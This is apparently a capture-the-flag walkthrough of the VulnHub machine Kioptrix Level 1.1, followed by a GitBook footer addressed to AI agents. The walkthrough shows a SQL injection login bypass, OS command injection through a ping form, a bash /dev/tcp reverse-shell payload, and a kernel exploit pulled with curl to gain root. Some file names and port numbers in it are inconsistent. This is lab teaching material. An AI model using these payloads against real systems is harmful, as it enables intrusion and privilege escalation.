> For the complete documentation index, see [llms.txt](https://0xa1mn.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xa1mn.gitbook.io/writeups/vulnhub/kioptrix-series/kioptrix-level-1.1-2.md). # KIOPTRIX Level 1.1 (#2) ## Scanning We first need to get the target IP. in my case network sittings was bridged so i run `sudo netdisover` to catch all ip in my network => kioprix ip is `192.168.1.6` you can use nmap to catch your ip using `-sP` flag ### nmap `sudo nmap -sV -p- -O -T4 192.168.1.7` * `-sV` determine service/version info * `-T4` for faster execution * `-p-` scan all ports * `-O` identify Operating System ``` sudo nmap -p- -T4 -O -A 192.168.1.6 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-19 06:35 EDT Nmap scan report for 192.168.1.6 Host is up (0.00090s latency). Not shown: 65528 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) | ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1) | 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA) |_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA) |_sshv1: Server supports SSHv1 80/tcp open http Apache httpd 2.0.52 ((CentOS)) |_http-server-header: Apache/2.0.52 (CentOS) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 843/udp status |_ 100024 1 846/tcp status 443/tcp open ssl/https? | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2009-10-08T00:10:47 |_Not valid after: 2010-10-08T00:10:47 |_ssl-date: 2021-07-19T07:27:09+00:00; -3h09m42s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_64_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_DES_64_CBC_WITH_MD5 | SSL2_RC4_128_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 |_ SSL2_DES_192_EDE3_CBC_WITH_MD5 631/tcp open ipp CUPS 1.1 | http-methods: |_ Potentially risky methods: PUT |_http-server-header: CUPS/1.1 |_http-title: 403 Forbidden 846/tcp open status 1 (RPC #100024) 3306/tcp open mysql MySQL (unauthorized) |_ssl-date: ERROR: Script execution failed (use -d to debug) |_tls-alpn: ERROR: Script execution failed (use -d to debug) |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug) Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3.2 OS details: Linux 3.2 Network Distance: 2 hops ​ Host script results: |_clock-skew: -3h09m42s ​ TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 0.12 ms 172.16.129.2 2 0.14 ms 192.168.1.6 ​ OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 80.23 seconds ``` lets take a look on port `80` ![](/files/-MjjHm2xYeZdIoU7sAcj) **administrator** login form !! lets try **SQLi** username: administrator password: ' or ''=' after login we find ping capability ![](/files/-MjjHuuTlBX6li8PLSH2) ## Gaining a Foothold ### OS command injection `ping 192.168.1.8 && whoami` output : ping 1.1.1.1 & whoami **apache** lets try to reach `/etc/passwd` `ping 192.168.1.8 && cat /etc/passwd` ``` ping 192.168.1.8 & cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash john:x:500:500::/home/john:/bin/bash harold:x:501:501::/home/harold:/bin/bash ``` **Get host info** `ping 192.168.1.8 & uname -a` `Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux` ### Create a shell session Open a shell session: * Set up netcat listener using `nc -lvp 4444` * Using the `; bash -i >& /dev/tcp/kioptrix/4444 0>&1` payload I was able to create a reverse-shell Now we have shell using apache user. [Reverse Shell Cheat Sheet](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) Now we have shell ... `---` ## Privilege Escalation ### Find Exploit from searchsploit we find this ``` ➜ ~ searchsploit Linux Kernel CentOS ​ ------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------ --------------------------------- Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedor | linux_x86-64/local/42275.c Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6 | linux_x86/local/42274.c Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/1 | linux/local/9545.c Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 | linux/local/9479.c Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4 | linux_x86/local/9542.c Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege | linux/local/25444.c Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - | linux_x86-64/local/45516.c Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'aiptek' Nullpointer Derefere | linux/dos/39544.txt Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'cdc_acm' Nullpointer Derefer | linux/dos/39543.txt Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'cypress_m8' Nullpointer Dere | linux/dos/39542.txt Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'digi_acceleport' Nullpointer | linux/dos/39537.txt Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'mct_u232' Nullpointer Derefe | linux/dos/39541.txt Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'Wacom' Multiple Nullpointer | linux/dos/39538.txt Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor 'treo_attach' Nullpoint | linux/dos/39539.txt Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor clie_5_attach Nullpoint | linux/dos/39540.txt Linux Kernel 3.10.0 (CentOS 7) - Denial of Service | linux/dos/41350.c Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Cras | linux/dos/39556.txt Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash ( | linux/dos/39555.txt Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (C | linux/local/42887.c Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Esca | linux/local/35370.c Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) A | linux/local/45175.c ------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results ​ ``` lets take a copy of `Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4 | linux_x86/local/9542.c` ``` ➜ ~ searchsploit -m 9542.c # take a copy for current working directory ``` Create a Python Simpleserver to serve the file ([Python3 command](https://gist.github.com/willurd/5720255) is a bit different) ``` ➜ ~ python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... ``` On the target machine, using our open shell session, run curl to pull the exploit file using `curl http://192.168.1.8:8080/9545.c --output /tmp/9545.c` command. Note: > We’re storing the file in the `/tmp` path as sometimes we might encounter permissions issues storing and accessing files in other directories. Use `ls -la /tmp` to verify the file exists ![](/files/-MjjIw4XgvNGK4cAAyb5) ``` bash-3.00$ gcc -o my_exploit 9545.c 9545.c:376:28: warning: no newline at end of file ​ bash-3.00$ ./my_exploit sh: no job control in this shell ​ sh-3.00# whoami root ``` * Root Access � --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xa1mn.gitbook.io/writeups/vulnhub/kioptrix-series/kioptrix-level-1.1-2.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.